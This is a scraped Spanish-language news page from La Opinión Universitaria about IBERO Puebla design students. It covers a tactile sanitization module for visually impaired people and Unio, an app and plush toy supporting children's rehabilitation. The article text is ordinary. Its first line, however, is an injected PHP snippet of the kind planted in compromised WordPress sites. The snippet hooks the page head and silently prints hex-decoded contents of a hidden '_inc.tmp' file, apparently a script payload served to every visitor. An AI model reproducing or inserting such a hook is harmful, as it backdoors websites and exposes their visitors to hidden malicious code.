if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Jóvenes diseñadores de IBERO Puebla develan realidades invisibilizadas – La Opinión Universitaria La Opinión Universitaria
Menu

Jóvenes diseñadores de IBERO Puebla develan realidades invisibilizadas

 

Si bien los discursos progresistas alimentan la inclusión y la ruptura del pensamiento normativo, pocas veces atienden las necesidades de las personas con discapacidad. Para Paola Lorena Barroso Jiménez, es urgente abordar estos temas para crear entornos verdaderamente incluyentes.

 

Al tener una hermana con discapacidad visual, la joven es consciente de que las ciudades y los objetos que en ellas existen no han sido pensados para estas poblaciones. Junto a sus compañeros María José Chávez Castillo y Juan Armando Romero Gutiérrez, estudiantes de Diseño Industrial en la IBERO Puebla, concibieron un módulo inclusivo para llevar a cabo una de las tareas esenciales de la realidad actual: la sanitización.

 

La premisa parte de la forma en que las personas con discapacidad visual comprenden lo que ocurre en su entorno. Gracias a un exhaustivo estudio etnográfico, los estudiantes constataron que los usuarios potenciales experimentan ansiedad al desconocer el proceso de desinfección para entrar a espacios cerrados. “Ellos no querían un objeto necesariamente para ellos, que los distinguiera. Querían algo que todos pudiéramos utilizar”, aclara Lorena.

 

El módulo (https://www.youtube.com/watch?v=VC2TGP4wY48&feature=emb_title) cuenta con tapetes táctiles que permite a los usuarios, a través del contacto con los zapatos, saber en qué etapa se encuentran. Así, el circuito consta de cuatro momentos: el inicio; la rampa que conduce a la toma de temperatura; el dispensador de gel, y la rampa de bajada para el secado del calzado. El dispositivo cuenta con un barandal que incluye instrucciones en braille.

 

Si bien el proyecto permanece en la etapa de conceptualización y modelado, la coordinadora de Diseño Textil, Mariana González de la Rosa, celebra que el equipo (conformado por estudiantes de tercer semestre) haya aplicado los conocimientos y valores inculcados en las asignaturas. “Pensar siempre en el diseño centrado en las personas y en el entorno es algo que han recibido en sus materias. Están comprendiendo el poder del diseño para transformar la realidad”.

 

Sana

Sonia Alexandra Race Ochoa realizó prácticas profesionales en un centro de equinoterapia en San Cristóbal de las Casas ahí se percató que muchos niños faltaban a su rehabilitación, provocando que perdieran los avances en su recuperación. La asistencia esporádica se debía a la falta de recursos económicos de las familias, los horarios de los padres o la desidia de los propios menores.

 

De regreso en Puebla, y junto a su compañera Naomi Hernández Soto, planteó la idea de un asistente que contribuya a la continuidad de las terapias. Como proyecto de titulación, las recién egresadas de Diseño de Interacción y Animación crearon Unio: sistema interactivo que consta de una aplicación digital y un muñeco de felpa con accesorios.

 

El proyecto, que obtuvo Mención de Plata en categoría App Estudiante, responde a las necesidades de salud al tiempo que se sitúa en las circunstancias de los usuarios. “No podemos decirle al usuario que siga su rehabilitación en casa por medio de una app; sería incongruente. Tomamos de la mano la interacción con un objeto físico para que pudieran tener rehabilitación motriz”, explica Naomi. En complemento, la aplicación ayuda a los padres a recordar los ejercicios de movilidad, además de llevar el registro de los avances con base en las sesiones.

 

 

Tweets recientes